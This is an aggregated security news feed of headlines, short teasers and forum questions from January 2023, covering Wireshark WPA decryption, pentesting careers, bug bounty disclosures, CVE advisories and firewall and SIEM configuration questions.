    Can't decrypt WPA3/WPA2 packets with Wireshark
    I am trying to monitor traffic on my network, but I can't seems to decrypt WPA3 packets. I'll go through the steps I took: I first set my Wi-Fi interface to monitor mode, then I changed the channel to 36 (5.18 GHz) as I have split 2.4 and 5GHz bands, but most devices, at least the ones I wish to monitor, are on the 5 GHz band. After that I disconnected and reconnected my phone to capture the 4 step handshake, which went well, and all 4 packets showed up. I used the Wireshark WPA PSK generator to generate a key from my SSID and password, which I entered into the 802.11 protocol decryption settings. I exited and nothing, everything was still encrypted, the exact same as before. I double checked and my handshake was still there. As mentioned I am using WPA3, so maybe that has something to do with the issue? I am very confused here, so any guidance would be appreciated, thank you. Edit: I have changed my security to WPA2, and I can now see broadcasts like MDNS ARP, and occasionally I’ll get TCP from my target machine, so maybe it’s a problem receiving the packets and not a problem with my software. submitted by /u/electromagneticpost [link] [comments]
    What technical skills make up a Pentester?
    As a pentester how would you rank the importance of following technical skills? How would you define the depth of knowledge for each skill set? What other skills would you add to this list? Coding in Python PowerShell C# Web App Pentesting? Defense Evasion Manual/Advanced exploitation and privesc Networking Protocols Pivioting Any other topics to consider? submitted by /u/dfclin073 [link] [comments]
    Would linked emails be a good idea for protecting accounts?
    I was thinking about login credentials and am wondering why linked emails aren't offered as a solution. So when you sign up to websites, usually it is in the form of email, password. I am lazy so I just use google to generate and store passwords for me. But what if the email used to create the account was unique for every website u signed up for and linked back to the main email you used? Lets say my email is [abc@gmail.com](mailto:abc@gmail.com), when I sign up to website A, google generates me a linking email: [gd7awg28adh8@gmail.com](mailto:gd7awg28adh8@gmail.com) which links back to [abc@gmail.com](mailto:abc@gmail.com) and forwards all the messages to my main account. And when I sign up to website B, it links another email [hwdahiusdifagwg78@gmail.com](mailto:hwdahiusdifagwg78@gmail.com). This would be beneficial in a few ways, 1. Maybe it would be harder to compromise accounts when hackers wouldn't even know what email they are trying to hack into? 2. If you dont have confidence in a website, they will never have your actual email. 3. If a website leaks your email or sells it w.e, maybe there's a feature that can stop forwarding the emails to your main account so that you dont receive spam/ dangerous emails? Just wanted to hear thoughts / flaws on this idea. Note: I asked this on r/cybersecurity but it was autoblocked by a bot for being a personal question. I feel like this post may also relate to this subreddit? submitted by /u/SaltyERB [link] [comments]
    Endpoint security in 100% BYOD organization
    Let's say there's an organization where 100% of the workforce is remote, and it's a non-profit so the management team has decided to effectively require a BYOD environment for desktop/laptops as well as mobile devices to cut costs. There is no IT department so this decision was made by people who are more budget managers than boots on the ground technicians. They're not on a domain network of any kind and are loosely collected around a cloud-based office collaboration platform for doc and file storage so it seems okay for everyone at the moment to just login from their home computers and do their days work and then clock out. Email is also handled through this cloud provider and MFA is enabled on all accounts (yay!). They also use an org password manager so another +1 for safe practices. …
  • Open

    Yet another litany of "dumb" & "googlable" questions from a wanna-be red team member
    Background: I'm just a typical developer who aspires to be red team one day. I'm studying for the cissp and would like to eventually become a red team member for the government. I have some credentials that allow me to work in this space but I want to Branch out from development and be more active in cyber security. I am AWS certified and after the cissp I will get the security certification from AWS. Has anyone tried a Portapack H2 Mayhem (RFOne knock off I think)? Just curious if anyone has tried this device. I saw it on eBay for 240 bucks and I've got some money burning a hole in my wallet so I thought I might take a look at it, see what I can see with it. Reportedly it goes up to 40 MHz to 6 GHz. I don't think I'd ever be required to use it for any reason but it might be fun to play…
  • Open

    Pods Bug Bounty V2
    Let’s hunt some bugs 🔍 Continue reading on Pods »
    Brute-force attacks Cheat Sheet (FTP, POP3, SNMP, SSH, VNC, …)
    Tool -> hydra Continue reading on Medium »
    From 2021 Through 2025, Global Cybersecurity Spending Will Exceed $1.75 Trillion.
    According to Cybersecurity Ventures, the need to secure increasingly digital enterprises, Internet of Things (IoT) devices, and customers… Continue reading on Bug Zero »
    Find Stored XSS & HTML Injections Easily
    This is a short tutorial to find stored XSS & HTML Injections easily. HTML injections occur when input isn’t sanitized to check or remove… Continue reading on Medium »
  • Open

    List of git commits before and after a security audit
    submitted by /u/kruksym [link] [comments]
    GraphQL exploitation – All you need to know – Cybervelia
    submitted by /u/Necessary-Reality-80 [link] [comments]
    Keeping the wolves out of wolfSSL (Protocol Fuzzing)
    submitted by /u/maxammann [link] [comments]
    Avoiding API Key Exposures: The Importance of Strong Fundamentals and the Limitations of AI
    submitted by /u/DevOpsMuffin39 [link] [comments]
    Exfiltration Over a Blocked Port on a Next-Gen Firewall
    submitted by /u/cuptugout [link] [comments]
  • Open

    How to solve 'Missing in action' [OSINT]
    Step by step writeup Continue reading on Write-ups HackTheBox »
    CHALLENGE ZEN
    Correction d’un petit challenge posté le 11/01/2023 sur twitter. Essayez de le résoudre avant de lire la correction. Continue reading on Medium »
    Sin — Interview with a Cyber Detective
    Cybercrime Investigator, OSINT Dojo sensei Continue reading on Medium »
  • Open

    Fortinet says hackers exploited critical vulnerability to infect VPN customers
    Article URL: https://arstechnica.com/information-technology/2023/01/fortinet-says-hackers-exploited-critical-vulnerability-to-infect-vpn-customers/ Comments URL: https://news.ycombinator.com/item?id=34359651 Points: 8 # Comments: 0
  • Open

    DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1714979 - Bounty: $4200
  • Open

    Introduction to Digital Forensics
    No content preview
    TryHackMe writeup: Dunkle Materie
    A case study in using ProcDOT to investigate a ransomware attack Continue reading on InfoSec Write-ups »
    Illumination — HackTheBox Forensics Writeup | 2023
    No content preview
  • Open

    Introduction to Digital Forensics
    No content preview
    TryHackMe writeup: Dunkle Materie
    A case study in using ProcDOT to investigate a ransomware attack Continue reading on InfoSec Write-ups »
    Illumination — HackTheBox Forensics Writeup | 2023
    No content preview
  • Open

    Introduction to Digital Forensics
    No content preview
    TryHackMe writeup: Dunkle Materie
    A case study in using ProcDOT to investigate a ransomware attack Continue reading on InfoSec Write-ups »
    Illumination — HackTheBox Forensics Writeup | 2023
    No content preview
  • Open

    Techniques in email forensics
    The various techniques in placing the suspect behind an email crime email forensic techniques submitted by /u/DFIRWarlock [link] [comments]
  • Open

    SecWiki News 2023-01-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Network Security Trends: August-October 2022
    Network security trends: Unit 42 provides summaries and analysis of the vulnerabilities published between August-October 2022. The post Network Security Trends: August-October 2022 appeared first on Unit 42.
  • Open

    FreeBuf早报 |苹果面临新的隐私诉讼;瑞士军队安全通信曝出大量漏洞
    英国跨国邮政服务和快递公司皇家邮政本周宣布,一起“网络事件”对其运营造成了严重影响。
    MacOS风险排查怎么做;春节安全值守怎么安排 | FB甲方群话题讨论
    Mac就一定比Windows等系统更安全吗?春节企业安全值守及应急响应有何方案?更多话题欢迎点击~
    FreeBuf 周报 | 高通骁龙通告 22 个安全漏洞;塞尔维亚政府机构遭 DDoS 攻击
    文章推荐了本周热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    Twitter 回应,2 亿用户数据不是通过系统漏洞流出
    沸沸扬扬的 Twitter 2 亿用户数据泄露并在网上出售的事件可能出现了反转。
  • Open

    Comic strips & coloring pages
    http://www.thismodernworld.com/media/arc/ https://littleab.com/comicbooks/ http://archive.sonichq.net/images/scans/archie/ http://www.comiclist.com/media/users/cslepage/ http://enterthestory.com/comics/FF/ ​ http://www.coloriez.com/images/coloriage/ https://www.indiaparenting.com/coloring-pages/uploads/ https://www.kidssearch.com/ColoringPages/ http://www.caboucadin.com/images/coloriages/ submitted by /u/Waste-Release-6235 [link] [comments]
    Bible studies
    http://www.amazingbible.org/Documents/Bible_Studies/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    mqtt 攻击面和挖掘思路浅析
    作者: 360漏洞研究院 苏熙杰 原文链接:https://vul.360.net/archives/649 前言 在很多IOT设备中默认存在MQTT服务,这是一个值得关注的攻击面。下面对MQTT协议及其挖掘思路进行分析。 WHAT? MQTT是基于TCP/IP协议栈构建的异步通信消息协议,是一种轻量级的发布、订阅信息传输协议。 可在不可靠的网络环境中进行扩展,适用于设备硬件存储空间或网络带...
  • Open

    mqtt 攻击面和挖掘思路浅析
    作者: 360漏洞研究院 苏熙杰 原文链接:https://vul.360.net/archives/649 前言 在很多IOT设备中默认存在MQTT服务,这是一个值得关注的攻击面。下面对MQTT协议及其挖掘思路进行分析。 WHAT? MQTT是基于TCP/IP协议栈构建的异步通信消息协议,是一种轻量级的发布、订阅信息传输协议。 可在不可靠的网络环境中进行扩展,适用于设备硬件存储空间或网络带...

  • Open

    Computer programs and stuff
    submitted by /u/themariocrafter [link] [comments]
    Random images and photos
    submitted by /u/themariocrafter [link] [comments]
    Games, retro ads, and other stuff
    http://ftp.us.matrixgames.com/pub/ https://www.whtech.com/ftp/games/ https://www.anorak.co.uk/wp-content/gallery/computer-adverts-retro/ http://pc.sux.org/SK/ https://www.retrowaste.com/wp-content/gallery/1990s-video-games-ads/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    How Russia appears in China: a look at Weibo
    I look at RT’s Sina Weibo feed to see if it can tell us anything interesting about Chinese speakers’ attitudes to Russia and the invasion. Continue reading on Medium »
    Deep Dive Benchmarking using OSINT Techniques on Google
    OSINT stands for “Open-Source Intelligence.” It refers to the practice of collecting, analyzing, and disseminating information that is… Continue reading on Medium »
    Logstash Filter Sentiment for Sentiment Analysis
    Overview Continue reading on Medium »
  • Open

    T95 Allwinner T616 Malware Analysis - "Pre-owned" Android TV Device
    submitted by /u/sanitybit [link] [comments]
    Legitify supports scanning GitLab for security misconfigurations and best practices
    submitted by /u/dotanoam [link] [comments]
    SANS Christmas Challenge 2022 - Write-up
    submitted by /u/the-useless-one [link] [comments]
  • Open

    Magnet Axiom Cyber Process - Analyze Evidence button "greyed" out.
    In MagnetAXiom Process 6.9.0.34051 I'm unable to Analyze Evidence. I have 7 evidence sources, and all show with Status Ready. I've stepped through the processing details one by one, and turned on what I wanted. However, when I get to the Analyze Evidence page, the button remains inactive. I'm not sur what's wrong. Anyone have any ideas? submitted by /u/waydaws [link] [comments]
    Time to learn and advance in my career.
    I started cyber security classes and Pentesting is a big part of them. I am on a Lenovo P50 and the screen is starting to flicker. I am looking at a Alienware 15 series M or X, and a older Lenovo P53 ad a replacement. I will be doing Pentesting, and Digital forensics with it. I know the video card is for the forensics, the Alienware will have a 3070ti and the Lenovo will have the T2000. I love the Lenovo keyboard but I have used Alienwares in the past, just older models. What do you think. submitted by /u/Reaper_one1 [link] [comments]
  • Open

    Execute Beacon Object Files (BOF) as Shellcode
    https://github.com/frkngksl/Shoggoth submitted by /u/valgrute [link] [comments]
    Is there a large need for physical access pentesters as part of a routine engagement with a client?
    Essentially I'm asking can I break in and physically access the network has a typical part of a evaluation for a client. Is that even a thing? I've been programming for 25 plus years and I'm tired of sitting behind the desk I want to go play Jason Bourne and that involves breaking into things. I realize this is a very ambiguous question and subject to a number of factors but I would be a complete newbie in the space of offensive security on a red team. I would just like to do something a little more challenging or just a completely different aspect of system security away from the keyboard mainly. Did anyone else get into red team operations for the same reasons? I was also an electrician in the Air Force and so Hardware hacking part would be interesting to me. I got into or stumbled into this notion that I might one day make a hacker as skillful as ZeroCool. I still got my roller blades. On a slightly different topic, is a yardstick a handy tool to have? I should look this up but any good plans or tutz (lulz) on building a pineapple with a raspberry pi that anyone would vouch for? thx submitted by /u/mikealicious- [link] [comments]
  • Open

    Announcing Bug Bounty Rewards Program
    Check out this blog post in español, 简体中文, 繁體中文, 日本語, हिंदी, 한국인, tiếng-việt, deutsch, português, français, русский, українська, persian… Continue reading on Medium »
    Learning Web-Sec - Day 10 - Authentication Labs
    Vulnerabilities in Password Based login - PortSwigger Labs Walkthrough. Continue reading on System Weakness »
    A Newbie’s Guide to Bug Bounty Hunting: Navigating the World of Subdomain Enumeration and URL…
    I recently began my thrilling journey of bug bounty hunting and I’m excited to share my experiences with you. I selected HackerOne as my… Continue reading on Medium »
    bWAPP LDAP Injection
    LDAP Nedir? Continue reading on Medium »
    JWT Security 101: How to defend against common attacks on JSON Web Tokens
    JSON Web Tokens (JWT) are a popular way to represent claims securely between two parties. They are often used for authentication and… Continue reading on Medium »
    Hack Analysis: Nomad Bridge, August 2022
    Introduction Continue reading on Immunefi »
    ChatGPT hacking tools for bug bounty, pentesting, blue teams, and more
    Hackers aren’t shy in exploiting brilliant tools like ChatGPT. They have used ChatGPT’s capabilities to speed up script writing… Continue reading on Medium »
    What is Remote code execution (RCE)?
    What causes RCE? There are many potential causes of RCE vulnerabilities. Continue reading on Medium »
    Preventing Cross-Site Scripting (XSS) Attacks with the HTML Special Characters Function in PHP
    Introduction: Continue reading on Medium »
    Broken Access Control: What I have learned
    This is a ongoing post, constantly updated with new information that I learned about Broken Access Control. Continue reading on Medium »
  • Open

    soc2 type 2 vs iso27001 - product vs whole company ?
    So, we are tech company that mostly develops different kind of products mostly webapps and some mobile applications. Our company is ISO 27001 certified and now we are in the process of achieving SOC2-Type2 certification. So, I am a bit confused, can our organization get a SOC2 type 2 certification or we need a specific PRODUCT or SERVICE XYZ and then it can be only SOC2 type 2 certified ? submitted by /u/skinny3l3phant [link] [comments]
    Is a laptop bought at a wholesaler like Costco any different than the same laptop bought elsewhere?
    I’ve been warned off of buying laptops from wholesalers a few separate times without much explanation. submitted by /u/SendCOMPTIAvouchers [link] [comments]
  • Open

    Ys IX, Another Disappointment, but Ys: Memories of Celceta though!
    Man, enough is enough! Continue reading on ILLUMINATION Gaming »
    Ys IX, Another Disappointment, but Ys: Memories of Celceta though!
    Man, enough is enough! Continue reading on Medium »
  • Open

    SecWiki News 2023-01-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Security Issue into Wallet lock protection
    Hiro disclosed a bug submitted by bug_vs_me: https://hackerone.com/reports/1792544 - Bounty: $200
    CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link
    Nextcloud disclosed a bug submitted by lukasreschke: https://hackerone.com/reports/1741430 - Bounty: $1250
    Take over subdomain undici.nodejs.org.cdn.cloudflare.net
    Node.js disclosed a bug submitted by algisec1337: https://hackerone.com/reports/1763817
  • Open

    Modbus Slave缓冲区溢出漏洞CVE-2022-1068分析与复现
    Modbus Slave是一个模拟工业领域通信协议Modbus从站的上位机软件,主要用于测试和调试Modbus从设备。
    FreeBuf早报 | 轨交业已成黑客攻击重灾区;丹麦央行网站遭 DDoS 攻击
    亚太地区的政府和军事组织正成为一个先前未知的APT攻击者 Dark Pink 的攻击目标。
    中国银保监会发布《银行保险监管统计管理办法》
    《办法》包括总则、监管统计管理机构、监管统计调查管理、银行保险机构监管统计管理、监管统计监督管理和附则等。
    刚被美国政府禁止,Tiktok 又遭遇欧盟隐私保护难题?
    TikTok首席执行官周受姿10日已赴欧盟进行沟通,被告知要在隐私合规等领域做出改进。
    【 2022中国白帽子调查报告】调研启动
    邀请您如实填写问卷信息,展现2022年中国白帽子的真实状况。
    StrongPity 黑客分发带有后门的应用程序以瞄准 Android 用户
    StrongPity组织通过一个冒充的视频聊天服务的虚假网站,以木马化版本的 Telegram 应用程序瞄准 Android 用户。
    商用密码应用与安全性评估常见问题汇总整理
    十三个问题解惑商用密码应用与安全性评估常见要点。
    域控安全之ntds.dit导出
    ntdsutil.exe是一个位活动目录(AD)提供管理机制的命令行工具。该工具默认安装在了域控制器上面。
  • Open

    Okta Auth0 JWT vulnerability CVE-2022-23529
    Article URL: https://github.com/advisories/GHSA-27h2-hvpr-p74q Comments URL: https://news.ycombinator.com/item?id=34335244 Points: 6 # Comments: 2
  • Open

    Okta Auth0 JWT vulnerability CVE-2022-23529
    Article URL: https://github.com/advisories/GHSA-27h2-hvpr-p74q Comments URL: https://news.ycombinator.com/item?id=34335244 Points: 6 # Comments: 2

  • Open

    Cacti: Unauthenticated Remote Code Execution (CVE-2022-46169)
    submitted by /u/monoimpact [link] [comments]
    How to find a Google account with a phone number
    submitted by /u/Gallus [link] [comments]
    Antivirus Evasion: Tearing AMSI down with 3 bytes only
    submitted by /u/juliocesarfort [link] [comments]
    Taking over a Dead IoT Company
    submitted by /u/phree_radical [link] [comments]
    Semgrep rules for Swift language (iOS mobile apps)
    submitted by /u/brugmayq [link] [comments]
    How to Analyze JavaScript Malware – A Case Study of Vjw0rm
    submitted by /u/CyberMasterV [link] [comments]
    An electromagnetic-wave side-channel issue on ARMv8 AES instructions
    submitted by /u/Gallus [link] [comments]
    ImageMagick Security Policy Evaluator
    submitted by /u/nibblesec [link] [comments]
  • Open

    How I passed the CBBH
    A bit of background on myself; My name is Trevor Slattery. I grew up in Belize and spent most of my life with little understanding of… Continue reading on Medium »
    How to Install a Tar.gz File on Linux?
    If you use Linux, you will sooner or later find yourself faced with the task of installing a tar.gz file. This article walks through the… Continue reading on Medium »
    How I Earned $1000 From Business Logic Vulnerability (account takeover)
    Hello security research, now i want to share about my finding on bug bounty program and earned $1000. Continue reading on Medium »
    Attacking Web Apps for Pentesting & Bug Bounty — Burpsuite
    Burp Suite is an incredibly powerful tool that is essential for any web application pen tester and bug-bounty hunter. In this article, we… Continue reading on Stealth Security »
    Unlock the boundless possibilities of ChatGPT: Hunt down pesky bugs and enjoy seamless automation!
    Are you a bug hunter? Looking for ways to up your game? Well, look no further! ChatGPT is possibly the best thing that’s happened to bug… Continue reading on Medium »
    2023 is here and yet again Experian strikes again
    My name is Jenya Kushnir I am the one who found this bug. I have tried to contact Experian myself to let them know they have a big problem… Continue reading on Medium »
    Ethical Hacking Roadmap with 23+ Courses
    Hello everyone in this blog we have share full ethical hacking roadmap along with the courses they should study from scratch to pro to… Continue reading on Medium »
    Bypass OTP
    Hello Guys, Continue reading on Medium »
    Seven Common Ways To Bypass Login Page
    Hellooo to all beginner bug hunting fellows. This is Uttam Gupta, today i came with an another blog on login page. This blog is about… Continue reading on Medium »
  • Open

    The Step-by-Step Guide to Setting Up a Shell Company and Unlocking its Potential Benefits
    What is a Shell Company and How Can It Help Your Business? Continue reading on Medium »
    How to solve challenge 'Money Flowz' [OSINT]
    Details of the challenge when was released (and the HTB website was much worst) Continue reading on Write-ups HackTheBox »
    How to solve 'ID Exposed' {OSINT} [HTB]
    Step by step solution to the challenge Continue reading on Write-ups HackTheBox »
    OSINT and Top 21 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »
    Hashing: The Secret Life of Data
    Picture this: You download an important document but, for the life of you, can’t figure out if it’s the real deal or not; You’re sending… Continue reading on The First Digit »
  • Open

    What’s the best way to start freelancing pentesting services ?
    submitted by /u/Technical-Weather-60 [link] [comments]
  • Open

    Google XSS Game Solutions — Writeups
    These are my steps how I’ve solved the XSS Game Continue reading on Medium »
  • Open

    CVE-2022-46176: Cargo does not check SSH host keys
    Article URL: https://seclists.org/oss-sec/2023/q1/13 Comments URL: https://news.ycombinator.com/item?id=34328369 Points: 4 # Comments: 0
    Security advisory for Cargo (CVE-2022-46176)
    Article URL: https://blog.rust-lang.org/2023/01/10/cve-2022-46176.html Comments URL: https://news.ycombinator.com/item?id=34327807 Points: 2 # Comments: 0
    CVE-2022-23529 – node-jsonwebtoken
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23529 Comments URL: https://news.ycombinator.com/item?id=34322778 Points: 2 # Comments: 3
  • Open

    Origin IP address disclosure through Pingora response header
    Cloudflare Public Bug Bounty disclosed a bug submitted by smither: https://hackerone.com/reports/1803659 - Bounty: $550
    Cross Origin Resource Sharing Misconfiguration
    Acronis disclosed a bug submitted by parshwa_21: https://hackerone.com/reports/958459
  • Open

    SecWiki News 2023-01-10 Review
    java反序列化从0到cc1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-10 Review
    java反序列化从0到cc1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Word document
    Whenever im downloading a word document or just a pdf file im scared that i am hacked or that i have spyware... Is it possible for someone to spy on me if i downloaded a word file or checked out a pdf file on internet? submitted by /u/Better_Presentation1 [link] [comments]
    Can NSO hack the iPhone in the lockdown mode?
    Apple describes the Lockdown Mode an extreme measure to protect the iPhone from the state-level actors or advanced threats. It’s Apple’s response to NSO’s Pegasus, that hacked the iPhone even with zero clicks. The question now is, can NSO come up with a new iteration of its tool to hack the iPhone in the locked down as well? What is your opinion? submitted by /u/chaplin2 [link] [comments]
    What could potentially happen when you connect to a shady free proxy?
    What exactly are the risks to using shady free proxies? I understand that if something is free, then you are the product, and that a big reason for using proxies is for privacy, and free proxies are not very good for your own privacy. My main interest with free proxies is having my bots avoid captchas. I know people really dislike questions that might seem dumb, but I really just want to learn. Thank you. submitted by /u/-GlobalFreedom- [link] [comments]
  • Open

    俄乌网络战中的秘密武器TOP 10 | FreeBuf年度盘点
    盘点俄乌网络战中最常用的10款秘密武器,了解冲突中使用了哪些数字技术和工具。
    NetSupport RAT 正利用精灵宝可梦游戏作为诱饵传播
    NetSupport Manager 是一款远程控制软件,普通用户可以使用,也经常被攻击者滥用。
    FreeBuf早报 | 美国加强对私营企业的太空网络防御;微软将向 ChatGPT 投资100亿美元
    微软正在考虑向基于人工智能的聊天机器人 ChatGPT 的所有者 OpenAI 投资 100 亿美元。
    火上浇油!巴尔干地区紧张局势下,塞尔维亚政府机构遭DDoS攻击
    塞尔维亚政府宣布其内政部网站和 IT 基础设施遭遇了几次“大规模 ”分布式拒绝服务(DDoS)攻击。
    高通骁龙通告22个安全漏洞,联想、微软和三星设备受影响
    漏洞影响了使用联想,微软和三星制造的Snapdragon芯片组的笔记本电脑和其他设备。
    为逃避追捕,暗网毒品市场开始使用定制化安卓应用
    在暗网上销售毒品和其他非法商品的在线市场已经开始使用定制的安卓应用程序来增加隐私,并逃避警方的追捕。
    SCA——开源安全威胁一网打尽
    SCA是一项通过分析软件包含的一些信息和特征来实现对该软件的识别、管理、追踪的技术。软件成分分析是任何安全开发生命周期的标准基本部分,及时发现问题可以降低成本,提高敏捷性,使软件更安全,并帮助开发团队
    构建大型捕获文件(Ⅱ)——Pcap分析仪:Allegro网络万用表的Pcap过滤器
    上一期我们讨论的是如何使用Wireshark工具进行结构化搜索的技术,这一期我们将为大家进行介绍,我们该如何使用 Allegro 网络万用表来加快 pcap 分析器的工作。
  • Open

    A LAPS(e) in Judgement
    As security practitioners, we live in a time where there is an abundance of tools and solutions to help us secure our homes, organizations, and critical data. We know the dangers of unpatched applications and devices as well as the virtues of things like password managers and encrypted databases to protect our passwords and other... The post A LAPS(e) in Judgement appeared first on TrustedSec.
  • Open

    Manuals
    https://neurophysics.ucsd.edu/Manuals/Andor%20Technology/ http://www.pestingers.net/pdfs/ https://electrickery.nl/comp/trs80m2/doc/index.html https://gmcotton.com/Ham_Radio/MISC%20Manuals/ http://cpmarchives.classiccmp.org/trs80/Library/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Awesome IDA, Ghidra, x64DBG, GDB & OllyDBG plugins
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Online Bachelors degree
    Hi all, I’m looking to change career paths and am strongly considering Cybersecurity with a focus in Digital Forensics. I’ve looked into a few online schools (I work full time in healthcare so online is my only option) and I’d love some input. Utica College seems like a decent option but would love any other information from anyone who pursued this career path fully online. Thank you! submitted by /u/foebe3673 [link] [comments]

  • Open

    Certificate Subject Key Identifier (SKI)
    This will hopefully be a quick / easy question to answer. We're implementing Certificate Based Authentication (CBA) to some items in O365. We created the template with the required x509 extensions in our internal CA and successfully created all the necessary user certs. The one thing I noticed though is that the SKI is identical on all of the generated certs. Shouldn't this be a unique value on each cert? Each cert was created using a unique CSR and submitted through the CAs web portal if that matters. Thanks! submitted by /u/atokknight [link] [comments]
    Whitelisting Gmail SMTP in CSF
    In my csf.deny, I have 0.0.0.0/0 blocked to prevent requests being sent to the raw server IP. This creates issues with sending e-mails. I utilize Google SMTP to send e-mail. I can't seem to figure out how to whitelist Gmail's SMTP while blocking 0.0.0.0/0. My Gmail SMTP settings are correct, and send e-mail properly when I don't have 0.0.0.0/0 blocked. I've tried a variety of things to try to allow Gmail's SMTP through, including: - Only blocking incoming requests to all ports from 0.0.0.0/0 with no rules on outgoing requests - Performing nslookup smtp.gmail.com, and whitelisting those IPs - Whitelisting smtp.gmail.com in csf.dyndns No matter what I try, if 0.0.0.0/0 is in csf.deny, e-mail will not be sent. Any suggestions? submitted by /u/GivingUp_RS [link] [comments]
    Candidate screening - writing skills
    I work at a shop that requires technical and report writing skills. We don't have any questions that we can use during the interview process to determine if the candidate knows how to write, and I'm wondering what other companies have in place to solve that problem. Job hunters: writing is extremely important, don't just focus on technical skills. submitted by /u/IrrationalNumb3rs [link] [comments]
    Master Password Migration / Reuse?
    I'm moving off of LastPass and to a different manager for obvious reasons. Is it safe to use the same master password that I used for LP on the new site? My understanding is that LP never stored or had access to the master, so using the same password seems like it should be safe, but also feels weird. Thoughts? submitted by /u/NoGoodNamesLeft_2 [link] [comments]
    Is it safe to store CCTV videos on Wyze cloud?
    Hello, I'm using a Wyze camera device and also using its cloud usage. Given the fact that the camera may sometimes records some sensitive moments, is it safe to store videos on Wyze cloud? As I know, I can access the CCTV footage on my mobile phone app only. Plus, I did enable MFA for my app. Any advice would be appreciated! submitted by /u/sanba06c [link] [comments]
    Is there an open data model standard for SIEM?
    so I know of some vendor information models/schema: Elastic -> ECS Sentinel -> ASIM Splunk -> CIM Qradar -> LEEF ArcSight -> CEF Google -> UDM wondering if there's any open standard somewhere for a standard log format. I'm asking mostly because there are thousands of open source projects providing their own logging system and if they follow an open standard for their information schema, converting that into any of the vendor-specific ones could be an easy task, especially for Sigma rules. submitted by /u/n0o0o0p [link] [comments]
    Implementing audit logging - need advice
    Hello, We are in the process of implementing an audit logging system, starting with getting the windows logs of all our systems in one place. To get the data into New Relic for analysis and alerting, I'm using WinLogBeat going to LogStash which then forwards the data. This is mostly as we have systems with no internet access. I trust this is a suitable solution but would value any feedback. Where I'm stuck is how to manage the log data once it reaches 90 days. New Relic allows for data export in JSON format which I could work with, but I'm wondering if there is a better way to do this - even if it means moving from New Relic to another tool (we have not yet committed to anything, this in my first time dealing with such a system). Looking for general advice here, would like to get this as right as possible the first time. Thanks in advance. submitted by /u/brettfk [link] [comments]
  • Open

    Basic Static Malware Analysis
    Hello guys! Today I have something great to show you, techniques and tools to perform a basic static malware analysis, but let’s explain… Continue reading on Medium »
    bypass two-factor authentication in Android apps and web 1000$ TikTok
    #bugbounty #bug #bounty Continue reading on Medium »
    Open redirects : bug bounties
    What are open redirects? Continue reading on Medium »
    Hacking Hackers for fun and profit
    This story will be in several parts. In each of the situations, I had to face unexpected results. Continue reading on Medium »
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    Hello Guys..!! Continue reading on AWS Tip »
    Hack Analysis: Beanstalk Governance Attack, April 2022
    Introduction Continue reading on Immunefi »
    “2022: A Year of Fascinating Discoveries”
    “Hello and welcome to my writeup! In this report, I will be sharing details about some of the vulnerability that I discovered in… Continue reading on Medium »
    Uploading the Webshell using filename of Content-Disposition Header Story!
    As-salamu alaykum everyone!  Hope you’re doing well I’m gonna explain one of my latest findings on a Web Site’s API Continue reading on Medium »
    ATTACKING ACTIVE DIRECTORY
    WITH LINUX Continue reading on Medium »
    Bug hunting: Open access to S3 bucket
    This blog post explains how I discovered a bug in a well-known ride-sharing platform that allowed me to access the firm’s assets stored in… Continue reading on Medium »
    My recon process (command-line)
    My recon methods and tools I use in Linux Continue reading on Medium »
  • Open

    The dark side of Gmail
    submitted by /u/osint_matter [link] [comments]
    Releasing hermes-dec, an open-source disassembler and decompiler for the React Native Hermes bytecode
    submitted by /u/marin-m [link] [comments]
    Unwrapping Ursnifs Gifts
    submitted by /u/TheDFIRReport [link] [comments]
    Practical Example Of Client Side Path Manipulation
    submitted by /u/Gallus [link] [comments]
    Reverse Engineering TikTok's VM Obfuscation (Part 2)
    submitted by /u/Gallus [link] [comments]
    Vulnerable Jenkins plugins exploitation
    submitted by /u/ntknn [link] [comments]
    How To Attack Admin Panels Successfully Part 2
    submitted by /u/banginpadr [link] [comments]
  • Open

    Vaporwave wallpapers & gifs
    https://five.sh/files/vaporwave/ ​ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    WordPress Vulnerability – Since 2017?
    Article URL: https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/ Comments URL: https://news.ycombinator.com/item?id=34314499 Points: 1 # Comments: 1
  • Open

    Beginners Guide to Container Security
    No content preview
  • Open

    Beginners Guide to Container Security
    No content preview
  • Open

    Beginners Guide to Container Security
    No content preview
  • Open

    Geolocation of an execution in Baghlan, Afghanistan
    Warning: Please be advised that this guide will explain how to geolocate an execution that was done by the Taliban in Baghlan, Afghanistan… Continue reading on Medium »
    FREE OSINT TOOLS
    Continue reading on Medium »
  • Open

    bypass two-factor authentication in Android apps and web
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1747978 - Bounty: $1000
    Possibility to delete files attached to deck cards of other users
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1755555 - Bounty: $500
    Missing character limitation allows to put generate a database error
    Nextcloud disclosed a bug submitted by error_2001: https://hackerone.com/reports/1596059
    Passcode bypass on Talk Android app
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1784645
  • Open

    SecWiki News 2023-01-09 Review
    AspectJWeaver利用链绕过serialKiller by SecIN社区 测量俄罗斯对 Twitter 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-09 Review
